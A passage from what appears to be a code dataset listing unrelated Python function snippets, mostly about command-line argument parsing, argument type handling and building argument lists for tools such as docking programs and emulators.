sorted(list(type_to_args[argtype]))\n arguments_to_python(real_args, argtype, outdir, prefix)", "def _create_args(self, func_args):\n self.llvm_ret_type = self._from_ctype(self.signature.ret_type)\n self.llvm_arg_types = \\\n [self._from_ctype(a) for a in self.signature.arg_ctypes]", "def get_arg_types(header):\n data_types = [param.dataType for param in header.params]\n\n if not data_types:\n return ArgType.Empty\n elif len(set(data_types)) > 1 or all(data_type == SSE.DUAL for data_type in data_types):\n return ArgType.Mixed\n elif all(data_type == SSE.STRING for data_type in data_types):\n return ArgType.String\n elif all(data_type == SSE.NUMERIC for data_type in data_types):\n return ArgType.Numeric\n else:\n return ArgType.Undefined", "def command_preparation(wrapped, func, **kwargs_c):\n wrapped.result_type = kwargs_c['result_type']\n (args, varargs, keywords, defaults) = inspect.getargspec(func)\n wrapped.__dict__['arguments'] = []\n wrapped.__dict__['arguments_type'] = {}\n wrapped.__dict__['function_name'] = func.__name__\n wrapped.__dict__['choices'] = {}\n for name_arg in filter(lambda x: x in kwargs_c, args):\n wrapped.choices[name_arg] = kwargs_c[name_arg]\n bias = 1 if 'self' in args else 0 # if first arg is self, 
see from second\n for index, name in enumerate(args[bias:]):\n wrapped.arguments.append((name, defaults[index]))\n wrapped.arguments_type[name] = utils.get_command_argument_type(defaults[index])", "def dev_args(devnames):\n devc = len(devnames)\n devnames_type = ctypes.c_char_p * devc\n devnames_arg = devnames_type()\n for idx, val in enumerate(devnames):\n devnames_arg[idx] = (val + chr(0)).encode('ascii')\n return ctypes.c_int(devc), ctypes.cast(\n devnames_arg, ctypes.POINTER(ctypes.c_char_p)\n )", "def _type_def_helper(name, args, env: Env) -> typing.Tuple[Basic, typing.Dict[str, Undecided]]:\n\n new_basic = make_basic(name)\n env.set_named_type(name, new_basic)\n _ty_args = OrderedDict((arg, Undecided()) for arg in args)\n env.undecided_types.update(_ty_args)\n return new_basic, _ty_args", "def arg_type(self):\n\n arg_type = self.ctype\n\n if 'int' in arg_type:\n arg_type = 'int'\n\n if self.is_list:\n arg_type = 'list of {}'.format(arg_type)\n\n if 'required' in self.qualifiers:\n arg_type = \"{}, optional\".format(arg_type)\n\n return arg_type", "def parse_arguments(args):", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n\r\n customparser.add_argument(\r\n \"--fulltypes\",\r\n dest=\"fulltypes\",\r\n action=\"store_true\",\r\n help=\"Optionally include this flag if you would prefer to \"\r\n \"return the full type name instead of the simplified versions\"\r\n \" (Redfish only option).\",\r\n default=None,\r\n )", "def _RegisterInputs(self):\n args = []\n for source in ['FcA', 'FcB']:\n gps_type = self._gps_type_per_source[source]\n if gps_type == 'Septentrio':\n args += [\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.x'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.y'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.z'),\n self._Arg('SeptentrioSolution', source, 'pvt_cartesian.mode'),\n self._Arg('SeptentrioSolution', source,\n 'pvt_cartesian.timestamp.tow'),\n ]\n elif gps_type == 'NovAtel':\n args += [\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_x'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_y'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_z'),\n self._Arg('NovAtelSolution', source, 'best_xyz.pos_type'),\n self._Arg('NovAtelSolution', source, 'best_xyz.timestamp.tow'),\n ]\n else:\n assert False\n return args", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def generateArgsList(self, I1, I2, O1, O2, O3, N, M, S, C ):\n ArgsList = [ \n \"-n\", str(N), \n # \"-m\", str(M), \n # \"-s\", str(S), \n \"-c\", str(C), \n ]\n if I1 > 0 or I2 > 0:\n if I1 > 0:\n ArgsList.append(\"-i1\")\n ArgsList.append(str(I1)) \n if I2 > 0:\n ArgsList.append(\"-i2\")\n ArgsList.append(str(I2))\n else: \n ArgsList.append(\"--noinput\")\n \n if O1 > 0 or O2 > 0 or O3 > 0:\n if O1 > 0:\n ArgsList.append(\"-o1\")\n ArgsList.append(str(O1)) \n if O2 > 0:\n ArgsList.append(\"-o2\")\n ArgsList.append(str(O2))\n if O3 > 0:\n ArgsList.append(\"-o3\")\n ArgsList.append(str(O3))\n else: \n ArgsList.append(\"--nooutput\")\n \n ArgsList.append(\"--nosummary\")\n ArgsList.append(\"--verbose\")\n return ArgsList", "def convert_dial_attrs_args(attrs, args):\n if attrs == None:\n attrs = {}\n attrs_list = [\"%s=%s\" % (k, v) for k, v in attrs.items()]\n if args == None:\n args = []\n c_attrs = list_of_strings_to_c_string_array(list(attrs_list)+[None])\n c_argv = list_of_strings_to_c_string_array(list(args)+[None])\n return 
c_attrs, c_argv", "def get_arguments():\n\tparser.add_argument('-i', '--interface', help='interface to affect')\n\tparser.add_argument('-m','--mac', help='mac to allocate')\n\n\targs = parser.parse_args()\n\tinterface = args.interface\n\tmac = args.mac\n\treturn (interface, mac)", "def get_cmd_args():\n\n\n\t#Creates the Argument Parser\n\tparser = ArgumentParser(description = \"ID Lab qPCR Analysis v\" + VERSION + \" \" + QUALITY)\n\n\t#Adds the input file argument\n\tparser.add_argument('-f', '--file',\n\t\t\t\tnargs = '+',\n\t\t\t\ttype = FileType('r'),\n\t\t\t\trequired = True)\n\n\t#Adds the output directory\n\tparser.add_argument('-o', '--output',\n\t\t\t\trequired = True)\n\n\t#Adds the model argument, to select between the three models\n\tparser.add_argument('-m', '--mod', '--model',\n\t\t\t\tnargs = '?',\n\t\t\t\tchoices = ['relative', 'absolute', 'stability'],\n\t\t\t\trequired = True)\n\n\t#Adds the control genes argument, taking a list of gene names\n\tparser.add_argument('-cg', '--cgenes', '--controlgenes',\n\t\t\t\tnargs = '+',\n\t\t\t\trequired = True)\n\n\t#Adds the optional control sample argument for the stability model, taking a list of sample names\n\tparser.add_argument('-cs', '--csample', '--controlsamples',\n\t\t\t\tnargs = '*')\n\n\t#Adds optional outlier cutoff\n\tparser.add_argument('-oc', '--ocutoff',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.3)\n\n\t#Adds optional max outliers\n\tparser.add_argument('-om', '--omax',\n\t\t\t\ttype = float,\n\t\t\t\tdefault = 0.5)\n\n\t#Adds optional encoding \n\tparser.add_argument('-e', '--encoding',\n\t\t\t\tdefault = 'ISO-8859-1')\n\n\t#Adds optional header size\n\tparser.add_argument('-hd', '--header',\n\t\t\t\tdefault = 47)\n\n\treturn vars(parser.parse_args())", "def make_args(port, n, t, population, test=None, value=0, failure=None, tx_rate=0, loglevel=logging.INFO, output=None,\n broadcast=True, fan_out=10, profile=None, validate=False, ignore_promoter=False):\n res = [str(port), str(n), str(t), str(population)]\n\n if test is not None:\n res.append('--test')\n res.append(test)\n\n res.append('--value')\n res.append(str(value))\n\n if failure is not None:\n res.append('--failure')\n res.append(failure)\n\n res.append('--tx-rate')\n res.append(str(tx_rate))\n\n if loglevel == logging.DEBUG:\n res.append('--debug')\n elif loglevel == logging.INFO:\n res.append('-v')\n\n # None represents stdout\n if output is not None:\n res.append('-o')\n res.append(output)\n\n if broadcast:\n res.append('--broadcast')\n\n res.append('--fan-out')\n res.append(str(fan_out))\n\n if profile:\n res.append('--profile')\n res.append(profile)\n\n if validate:\n res.append('--validate')\n\n if ignore_promoter:\n res.append('--ignore-promoter')\n\n return res", "def universal_args(self):\n args = list(self.BASIC_ARGS)\n # Set ATF to be the bios\n args += [\"-bios\", \"%s/bl1.bin\" % self.config.atf]\n\n if self.config.linux:\n args += [\n \"-kernel\",\n \"%s/arch/arm64/boot/Image\" % self.config.linux\n ]\n args += [\"-append\", self.LINUX_ARGS]\n\n if self.config.android:\n args += self.android_drives_args()\n\n return args", "def create_arg_list(self):\n\n sim = self.sim\n\n py_kernel_args = sim.kernel_args # Python variables that are passed into the kernel\n gen_kernel_args = sim.ctx_info['kernel_arguments'] # A list of needed kernel arguments from kernel autogen (Mako)\n\n list_for_kernel = gen_kernel_args[self.short_name]\n\n python_args_needed = [z[0] for z in list_for_kernel]\n\n self.arg_list = [py_kernel_args[z] for z in 
python_args_needed]\n\n # Loop over the arg_list...if the argument is a function, call it!\n for i in range(len(self.arg_list)):\n value = self.arg_list[i]\n if inspect.isfunction(value):\n self.arg_list[i] = value()\n\n additional_cl_args = [sim.queue, self.kernel_global_size, self.kernel_local_size]\n\n self.arg_list = additional_cl_args + self.arg_list", "def get_argdict(cls, toolchain, args):\n return {} # Empty must be overloaded (if required)", "def build_argv(software: str, receptor: str, ligand: str,\n center: Tuple[float, float, float],\n size: Tuple[int, int, int] = (10, 10, 10),\n ncpu: int = 1, name: Optional[str] = None, path: str = '.',\n extra = Optional[List[str]]) -> Tuple[List[str], str, str]:\n if software not in {'vina', 'smina', 'psovina', 'qvina'}:\n raise ValueError(f'Invalid docking program: \"{software}\"')\n\n path = Path(path)\n if not path.is_dir():\n path.mkdir(parents=True)\n\n name = name or (Path(receptor).stem+'_'+Path(ligand).stem)\n extra = extra or []\n\n out = path / f'{software}_{name}_out.pdbqt'\n log = path / f'{software}_{name}_log.txt'\n \n argv = [\n software, f'--receptor={receptor}', f'--ligand={ligand}',\n f'--center_x={center[0]}',\n f'--center_y={center[1]}',\n f'--center_z={center[2]}',\n f'--size_x={size[0]}', f'--size_y={size[1]}', f'--size_z={size[2]}',\n f'--cpu={ncpu}', f'--out={out}', f'--log={log}', *extra\n ]\n\n return argv, out, log", "def get_command_line_args(argv):\n # Initialize the arguments to their default values \n\n args = {'startdate': '20200101',\n 'enddate': '20200102',\n 'outfile': 'test.nc',\n 'dt': 5,\n 'real': True,\n 'south': False,\n 'tcv': False,\n 'substorm': False,\n 'ions': False,\n 'move': False,\n 'cusp': False}\n\n arg_type = {'startdate': str,\n 'enddate': str,\n 'outfile': str,\n 'dt': float,\n 'real': bool,\n 'south': bool,\n 'tcv': bool,\n 'substorm': bool,\n 'ions': bool,\n 'move': bool,\n 'cusp': bool}\n \n # If there is input, set default help to False\n args['help'] = False if len(argv) > 0 else True\n \n # Cycle through all arguments except the first, saving input\n for arg in argv:\n # Treat the file list and formatting seperately\n if arg.find('-') == 0:\n # This is not a filename, remove the dash to get the key\n split_arg = arg.split('=')\n akey = split_arg[0][1:]\n # Get the argument value as the desired type\n if akey not in arg_type.keys():\n raise ValueError(''.join(['unknown command line input, ',\n arg, ', try -help for details']))\n\n if len(split_arg) == 1:\n if arg_type[akey] == bool:\n arg_val = True\n else:\n raise ValueError('expected equality after flag {:}'.format(\n akey))\n else:\n if arg_type[akey] == int:\n arg_val = int(split_arg[1])\n elif arg_type[akey] == float:\n arg_val = float(split_arg[1])\n elif arg_type[akey] == str:\n arg_val = split_arg[1]\n else:\n # This is boolean input\n arg_val = bool_string(split_arg[1])\n\n args[akey] = arg_val\n \n return args", "def get_arg(instruction, itype):\n\n if itype == itypes.family_code:\n return instruction[7:2]\n elif itype == itypes.opcode:\n return instruction[7:]\n elif itype == itypes.funct3:\n return instruction[15:12]\n elif itype == itypes.funct7:\n return instruction[32:25]\n elif itype == itypes.rs1:\n return instruction[20:15]\n elif itype == itypes.rs2:\n return instruction[25:20]\n elif itype == itypes.imm12lo:\n return concat(instruction[32], instruction[7], instruction[31:27])\n elif itype == itypes.imm12hi:\n return concat(instruction[27:25], instruction[12:8])\n elif itype == itypes.instruction_id:\n return 
instruction[15:12]\n elif itype == itypes.rd:\n return instruction[12:7]\n elif itype == itypes.imm12:\n return instruction[32:20]\n elif itype == itypes.imm12_sb:\n return concat(instruction[32:25], instruction[12:7])\n elif itype == itypes.imm20:\n return concat(instruction[31], instruction[20:12], instruction[20], instruction[31:21])\n elif itype == itypes.imm20_pc:\n return instruction[31:12]\n elif itype == itypes.shamtw:\n return instruction[25:20]\n elif itype == itypes.shamt:\n return instruction[25:20]\n else:\n return None", "def get_init_arguments_and_types(cls) -> List[Tuple[str, Tuple, Any]]:\n trainer_default_params = inspect.signature(cls).parameters\n name_type_default = []\n for arg in trainer_default_params:\n arg_type = trainer_default_params[arg].annotation\n arg_default = trainer_default_params[arg].default\n try:\n arg_types = tuple(arg_type.__args__)\n except AttributeError:\n arg_types = (arg_type,)\n\n name_type_default.append((arg, arg_types, arg_default))\n\n return name_type_default", "def convert_arg((arg, attrs, mode, typ, name)):\n iorname = name\n return iorname, (arg, attrs, mode, typ, name)", "def get_args():\n args_obj = None\n parser = argparse.ArgumentParser(description='This tool is for installing mellanox-os')\n parser.add_argument('-s', '--switch-name', help='Switch name to connect', required=True)\n parser.add_argument('-u', '--switch-username', help='Switch name to connect', default='admin')\n parser.add_argument('-sp', '--switch-password', help='Switch name to connect', default='admin')\n parser.add_argument('-i', '--switch_ip', help='Switch ip to connect')\n parser.add_argument('-b', '--install', action='store_true', help='Install mellanox-os')\n parser.add_argument('-d', '--fetch', action='store_true', help='fetch mellanox-os')\n parser.add_argument('-f', '--force', action='store_true', help='force fetch and install')\n\n parser.add_argument('-l', '--image-path', help='image path location')\n parser.add_argument('-n', '--image-name', help='image name')\n\n parser.add_argument('-m', '--master-ip', help='master ip to fetch the image from')\n parser.add_argument('-p', '--master-password', help='master password to connect from the switch')\n parser.add_argument('-v', '--verbosity', help='increase output verbosity')\n\n try:\n args_obj = parser.parse_args()\n if args_obj.install is True and args_obj.image_name is None:\n parser.error('--install can only be used when image-path and image-name are provided.')\n if args_obj.fetch is True and args_obj.master_ip is None or args_obj.master_password is None or\\\n args_obj.image_path is None:\n parser.error('--fetch can only be used when master-ip and master-password are provided.')\n\n except IOError as exc:\n parser.error(str(exc))\n return args_obj", "def do_command(self, args):\n ostypeops = dbops.OsTypes()\n ostypeops.add(args)", "def parseCMDParam():\n\n progName = sys.argv[0]\n\n progName = extractFileName(progName)\n\n format = \"python \" + progName + \" [-h] -b binary_path -p hardware_platform -k private_key_path -x bootloader_hex_file_path\"\n\n example1 = \"\\t get help: \\n\" + \"\\t\\tpython \" + progName + \" -h\"\n\n example2 = \"\\t use inputImage.bin, MCHP-Curiosity-PIC32MZEF, private_key.pem , aws_bootloader.X.production.hex as parameter : \\n\" \\\n + \"\\t\\tpython \" + progName + \" -b inputImage.bin -p MCHP-Curiosity-PIC32MZEF -k private_key.pem -x aws_bootloader.X.production.hex\"\n\n usageMsg = format + \"\\n\\n\" + \"example usages:\" + \"\\n\" + example1 + \"\\n\" + example2\n\n 
parser = argparse.ArgumentParser(usage=usageMsg)\n\n parser.add_argument('-b', required=True, help=\" path of input binary image \")\n parser.add_argument('-p', required=True, help=\" hardware platform name \")\n parser.add_argument('-k', required=True, help=\" path of the private key used to sign the image \")\n parser.add_argument('-x', required=True, help=\" path of the bootloader hex file \")\n\n args = vars(parser.parse_args())\n\n inputImagePath = args[\"b\"]\n\n hardwarePlatform = args[\"p\"]\n\n privateKeyPath = args[\"k\"]\n\n bootloaderHexPath = args[\"x\"]\n\n return inputImagePath, hardwarePlatform, privateKeyPath, bootloaderHexPath", "def define_parameters(parser):\n parser.add_argument(\"--bson\", help=\"If the language supports add bson tags or bson representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--csv\", help=\"If the language supports add CSV tags or CSV representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--db\", help=\"adds db tags to Go structs.\" , action=\"store_true\")\n parser.add_argument(\"--input\", default=\"\", help=\"the path to the input CSV file\",type=str )\n parser.add_argument(\"--input-dir\", default=\"\", help=\"the path to the directory that contains the CSV files to parse\",type=str )\n parser.add_argument(\"--json\", help=\"If the language supports add JSON tags or JSON representation to the structure\", action=\"store_true\")\n parser.add_argument(\"--package\", help=\"sets the package to the correct name for Go structs\", action=\"store_true\")\n parser.add_argument(\"--language\", choices=[LANG_GO], default=LANG_GO, help=\"create language specific data structures\", required=True, type=str)\n parser.add_argument(\"--name\", help=\"name of the data structure being created\", type=str)\n parser.add_argument(\"--output-dir\", help=\"the directory where the generated file should be written. 
If not provided file will be written to stdout\")\n parser.add_argument(\"--verbose\", help=\"more output during the parsing and creation of the data structures\", action=\"store_true\")", "def args_str(self):", "def _get_add_package_args(self, package, type_option, version_option):\n raise NotImplementedError()", "def __init__(self, *args):\n self.types = tuple([trait_from(arg) for arg in args])\n self.fast_validate = (9, self.types)", "def _getargs(fn_sig):\n params = fn_sig.parameters\n args = []\n for k, v in params.items():\n if (v.kind & v.POSITIONAL_OR_KEYWORD) == v.POSITIONAL_OR_KEYWORD:\n args.append(k)\n else:\n msg = \"%s argument type unsupported in jitclass\" % v.kind\n raise errors.UnsupportedError(msg)\n return args", "def get_set_platform_temperature_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n temp = params.get('S') \n tool = params.get('T')\n args = [temp,tool] \n return args", "def validate_args(self, in_args, cmd_call):\n valid_1, valid_2 = None, None\n\n if len(in_args) > 0 and type(in_args) is not list:\n args = in_args.split()\n valid_1 = args[0]\n elif type(in_args) is list and len(in_args) > 0:\n args = in_args\n valid_1 = args[0]\n else:\n args = []\n\n if cmd_call in ['default']:\n # Default : Returns a valid cui type for an input cui\n # checks to see if there is more than 2 arguments\n # if so, arg[0] may be a valid code\n # arg[1] may be a valid code type\n # if not ask the user what type of code type arg[0] is\n # valid_1 = valid cui type\n # valid_2 = None\n while True:\n if len(args) >= 2 and len(args) <= 3:\n input_type = args[1].upper()\n else:\n input_type = input(\"What type of id is '{0}'? [LOCAL/RXCUI/NDC/SNOMED]\".format(args[0])).upper()\n\n # Confirm it's a valid code type\n valid_type = self.validate_id_type(input_type)\n # Valid type is a boolean of True\n if isinstance(valid_type, str) or valid_type is None:\n return None\n elif valid_type:\n break\n elif not valid_type:\n print('Invalid Option, Please Try Again')\n continue\n valid_1 = input_type\n\n elif cmd_call in self.cmd_config_default:\n # valid_1 : Valid Cui , valid_2 : Valid Cui Type\n valid_2, _ = self.validate_args(args, 'default')\n valid_1 = args[0]\n\n elif cmd_call == 'code_lookup':\n # args[0] : Initial CUI, args[1] : Initial CUI Type, args[2] : Target CUI Type\n # valid_1 : valid cui, valid_2 : list valid source and target\n _dict_opts = util.OPTIONS_CUI_TYPES.copy()\n _avail = list(set(smores.get_dict_sources()) & set(_dict_opts))\n if len(_avail) == 0 and len(args) < 2:\n print('There are no available starting cui types that can be crosswalked.\\n'\n 'Please load a file containing valid cui types: {0}'.format(_dict_opts))\n return False, None\n\n if len(args) >= 2:\n if len(args) == 3:\n # provided cui, cui source, and target\n valid_2, _ = self.validate_args(args, 'default')\n source, target = args[1].upper(), args[2].upper()\n else:\n source, target = args[0].upper(), args[1].upper()\n valid_1 = simple_input(\"Is {0} the correct starting source? 
\".format(source), ['YES', 'NO', 'exit'])\n if valid_1 == 'exit':\n return False, None\n # TODO need path for valid_2\n else:\n valid_1 = simple_input(\"Which code set do you want to start with?\", _avail)\n if valid_1 != 'exit':\n _dict_opts.remove(valid_1) # Don't lookup what we've already got\n valid_2 = simple_input(\"Which code set do you want to get results for?\", _dict_opts)\n if valid_2 == 'exit':\n return False, None\n else:\n return False, None\n\n elif cmd_call == 'errors':\n _current_err = list(self.errors.keys())\n if len(args) > 1:\n smores_error('#Cx001.7', console_p=True)\n return\n elif len(args) == 1 and args[0].lower() in _current_err:\n valid_1 = args[0]\n elif len(args) == 1:\n print('There are currently no errors logged for that command.')\n return\n else:\n valid_1 = simple_input(\"Please choose a command from the list to see errors: \", _current_err)\n\n elif cmd_call in ['csv', 'remap', 'fhir', 'json']:\n # Format: [File] [Output]\n if not self.inputs['loaded']:\n print(\"No Files Loaded!\\nYou Must load a file containing local medications first\")\n else:\n _file_opts = list(self.inputs['files'].keys()) + ['All']\n _dict_opts = list(smores.get_dict_sources(True)) #+ ['All']\n _file_or_dict = None\n\n if cmd_call in ['csv', 'json']:\n if len(args) == 0:\n _file_or_dict = simple_input(\"Do you want results for a File or a constructed Dictionary?\",\n ['File', 'Dictionary', 'exit'], True)\n elif args[0] not in _file_opts and args[0] not in _dict_opts:\n print('That option was not recognized as a valid source.')\n _file_or_dict = simple_input(\"Do you want results for a File or a constructed Dictionary?\",\n ['File', 'Dictionary', 'exit'], True)\n else:\n valid_1 = args[0]\n\n if _file_or_dict.upper() == 'FILE':\n valid_1 = 'FILE|' + simple_input(\"Please choose a loaded file\", _file_opts, True)\n\n elif _file_or_dict.upper() == 'DICTIONARY':\n valid_1 = 'DICT|' + simple_input(\"Please choose a code dictionary to output\", _dict_opts, True)\n elif _file_or_dict.upper() == 'EXIT':\n return None, None\n\n else:\n valid_1 = simple_input(\"Please choose a loaded file\", _file_opts, True)\n\n if cmd_call in ['csv', 'json', 'fhir']:\n if len(args) == 2 and len(args[1]) > 0:\n valid_2 = args[1]\n else:\n valid_2= input(\"Please provide an output file name:\").strip()\n\n if len(valid_2) > 0:\n if \".\" in valid_2:\n valid_2, ext = valid_2.split(\".\")\n else:\n valid_2 = ''\n print('Empty file name provided, using default.')\n else:\n valid_2 = args[0]\n\n elif cmd_call == 'file':\n re_use = False\n if self.inputs['loaded'] and len(in_args) == 0:\n print(\"The following file(s) have already been loaded: \\n\" + str(self.inputs['files']))\n _load_more = simple_input(\"Would you like to load an additional file?\", ['Y', 'N', 'exit'])\n if _load_more == 'Y':\n pass\n elif _load_more == 'N':\n _re_use = simple_input(\"Would you like to re-use a loaded file?\", ['Y', 'N', 'exit'])\n if _re_use == 'Y':\n re_use = True\n else:\n return False, None\n else:\n return False, None\n\n if in_args is not None and len(in_args) > 0:\n valid_1 = in_args\n else:\n valid_1 = input(\"Please enter the name of the file to load: \") if not re_use else simple_input(\n 'Select the file to be used: ', list(self.inputs['files'].keys()), index=True)\n\n while True:\n if valid_1 in self.inputs['files']:\n if not re_use:\n print(\"It looks like you've already loaded that file. 
Please try a different file.\")\n valid_1, valid_2 = input(\"Please enter the name of the file to load: \")\n else:\n break\n elif len(valid_1) == 0:\n smores_error('#Cx001.7', logger=smoresLog)\n valid_1, valid_2 = input(\"Please enter the name of the file to load: \")\n else:\n break\n\n if not resolve_target_path(valid_1):\n valid_1, valid_2 = self.validate_args('', 'file')\n\n elif '.smr' in valid_1:\n if len(self.inputs['files']) > 0:\n print(\n 'It looks like you are trying to load a session, this will replace the current session and '\n 'all previous work.')\n _save = simple_input('Do you want to save the current session first?', ['Y', 'N', 'EXIT'])\n if _save == 'Y':\n smores.save_session(self.__version__)\n elif _save == 'EXIT':\n return False, None\n valid_2 = 'session'\n else:\n valid_2 = 'file'\n\n smoresLog.debug('Args: {0}, Validated as: {1}'.format(valid_1, valid_2))\n return valid_1, valid_2", "def setup_cmd_args():\n parser = argparse.ArgumentParser(description=\"This program will query G-POD and COPHUB on the same datasets, in order to obtain the number of data results, compare them compile a report with the differences.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n # parser.add_argument(\"root_dir\", help=\"The root directory containing data to check\")\n # parser.add_argument(\"--workspace\", help=\"Set Workspace manually\")\n parser.add_argument(\"--outputlist\", help=\"Folder to write the output lists with the un-synced products.\", default=\"c:\\\\temp\\\\\")\n parser.add_argument(\"--daysback\", help=\"Report with a given number of days back from today\", default=0)\n parser.add_argument(\"--dataset\", help=\"Set which dataset to query (chose S3A_SR_1_SRA_A_PREOPS or S3B_SR_1_SRA_A_NTC)\")\n parser.add_argument(\"--startdate\", help=\" The Start Date (format: YYYY-MM-DD) \", default=\"2016-06-01\")\n parser.add_argument(\"--enddate\",help=\" The End Date (format: YYYY-MM-DD)\")\n parser.add_argument(\"--cphubuser\",help=\"COPHUB username\", required=True)\n parser.add_argument(\"--cphubpw\",help=\"COPHUB password\", required=True)\n parser.add_argument(\"-email\", type=str, help=\"Email to send the results\", action=\"append\")\n parser.add_argument('-t', action='store_true', help=\"Today as enddate. 
Otherwise the last day of the previous month is considered.\")\n parser.add_argument('-n', action='store_true', help=\"Normal numeric check\")\n parser.add_argument('-m', action='store_true', help=\"Monthly check with product listing.\")\n return parser.parse_args()", "def initialize_types():\n global VOID, VOID_P, VOID_PP\n global CHAR, CHAR_P, CHAR_PP\n global INT, INT_P, INT_108A\n global ULONG, UINT\n \n VOID = gdb.lookup_type(\"void\")\n VOID_P = VOID.pointer()\n VOID_PP = VOID_P.pointer()\n \n CHAR = gdb.lookup_type(\"char\")\n CHAR_P = CHAR.pointer()\n CHAR_PP = CHAR_P.pointer()\n \n INT = gdb.lookup_type(\"int\")\n INT_P = INT.pointer()\n INT_108A = INT.array(108)\n\n UINT = gdb.lookup_type(\"unsigned int\")\n ULONG = gdb.lookup_type(\"unsigned long\")", "def __set_utils_types(self):\n self.__arrayt = type(self.c_byte * 1)\n # self.__cfuncptrt = type(type(self.memmove))\n # class _p(self.Structure):\n # pass\n # self.__ptrt = type(self.POINTER(_p))\n self.__basic_types_name = {\n 'c_bool': '?',\n 'c_char': 'c',\n 'c_byte': 'b',\n 'c_ubyte': 'B',\n 'c_short': 'h',\n 'c_ushort': 'H',\n 'c_int': 'i', # c_int is c_long\n 'c_uint': 'I',\n 'int': 'i',\n 'c_longlong': 'q',\n 'c_ulonglong': 'Q',\n 'c_float': 'f',\n 'c_double': 'd',\n 'c_longdouble': 'g',\n 'c_char_p': 's',\n 'c_void_p': 'P',\n # 'c_void': 'P', ## void in array is void_p ##DEBUG\n }\n if self.__longsize == 4:\n # long == int\n self.__basic_types_name.update({'c_long': 'i',\n 'c_ulong': 'I',\n 'long': 'i',\n 'c_void': 'I'})\n elif self.__longsize == 8:\n # long == longlong\n self.__basic_types_name.update({'c_long': 'q',\n 'c_ulong': 'Q',\n 'long': 'q',\n 'c_void': 'Q'})\n # we need to account for the possible changes in c_longdouble\n self.__basic_types = set([getattr(self, k) for k in self.__basic_types_name.keys() if hasattr(self, k)])\n return", "def parse_cmd_args():\n parser = argparse.ArgumentParser(description='This program applies an RL method to an OpenAI gym environment')\n for name, val in config1.items():\n if type(val) is bool:\n parser.add_argument('--' + name, action='store_true', dest=name)\n parser.add_argument('--not_' + name, action='store_false', dest=name)\n parser.set_defaults(**{name: val})\n else:\n parser.add_argument('--' + name, type=type(val), default=val)\n\n args = parser.parse_args()\n return args", "def _get_commander_args(function_name, data,\n working_dir,\n num_workers,\n shared_lib='./libdml_toolkits.so',\n cluster_type='standalone_passive',\n output_name='out',\n **kwargs):\n args = dict()\n # from arguments\n args['function'] = function_name\n args['args'] = data\n args['num_nodes'] = num_workers\n args['working_dir'] = _make_internal_url(working_dir)\n\n # from optional arguments\n args['shared_lib'] = shared_lib\n args['cluster_type'] = cluster_type\n args['output_name'] = output_name\n\n # from kwargs, could overwrite existing args\n accepted_args = list(args.keys()) + ['check_hdfs', 'startup_timeout',\n 'metric_server_address_file',\n 'metric_server_port']\n for key in accepted_args:\n if key in kwargs:\n args[key] = kwargs[key]\n\n # return a formated list\n return ['--%s=%s' % (k, v) for k, v in args.items()]", "def test1SetBuiltinTypes( self ):\n\n from AthExHelloWorld.AthExHelloWorldConf import HelloAlg\n\n HelloWorld = HelloAlg( 'HelloWorld' )\n\n HelloWorld.MyInt = 42\n HelloWorld.MyBool = True\n HelloWorld.MyDouble = 3.14159\n HelloWorld.MyStringVec = [ \"Welcome\", \"to\", \"Athena\", \"Framework\", \"Tutorial\" ]\n HelloWorld.MyStringVec += [ \"!\" ]\n HelloWorld.MyDict = { 
'Bonjour' : 'Guten Tag',\n 'Good Morning' : 'Bonjour' , 'one' : 'uno' }\n HelloWorld.MyDict[ \"Goeiedag\" ] = \"Ni Hao\"\n HelloWorld.MyTable = [ ( 1 , 1 ) , ( 2 , 4 ) , ( 3 , 9 ) ]\n HelloWorld.MyTable += [ ( 4, 16 ) ]\n HelloWorld.MyMatrix = [ [ 1, 2, 3 ],\n [ 4, 5, 6 ] ]\n HelloWorld.MyMatrix += [ [ 7, 8, 9 ] ]\n\n HelloWorld.setup()\n\n self.assertEqual( HelloWorld.MyInt, 42 )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyInt', '42' ) )\n\n self.assertEqual( HelloWorld.MyBool, True )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyBool', 'True' ) )\n\n self.assertEqual( round( HelloWorld.MyDouble - 3.14159, 8 ), 0. )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyDouble', '3.14159' ) )\n\n # the following may be too sensitive to non-consequential changes in formatting\n self.assertEqual( HelloWorld.MyStringVec,\n [ \"Welcome\", \"to\", \"Athena\", \"Framework\", \"Tutorial\", \"!\" ] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyStringVec',\n \"['Welcome', 'to', 'Athena', 'Framework', 'Tutorial', '!']\" ) )\n\n self.assertEqual( HelloWorld.MyDict,\n {'Bonjour': 'Guten Tag', 'one': 'uno', 'Goeiedag': 'Ni Hao', 'Good Morning': 'Bonjour'} )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyDict',\n {'Bonjour': 'Guten Tag', 'one': 'uno', 'Goeiedag': 'Ni Hao', 'Good Morning': 'Bonjour'} ) )\n self.assertEqual( HelloWorld.MyTable, [(1, 1), (2, 4), (3, 9), (4, 16)] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyTable',\n \"[(1, 1), (2, 4), (3, 9), (4, 16)]\" ) )\n\n self.assertEqual( HelloWorld.MyMatrix, [[1, 2, 3], [4, 5, 6], [7, 8, 9]] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyMatrix',\n \"[[1, 2, 3], [4, 5, 6], [7, 8, 9]]\" ) )", "def get_arg_select(arg_list):\n\n arg_select_string = ''\n argument_list = (itypes.rs1, itypes.rs2, itypes.rd, itypes.rm,\n itypes.imm12lo, itypes.imm12hi, itypes.imm12,\n itypes.imm20, itypes.shamt,\n itypes.shamtw)\n arg_select_list = ['0' for i in 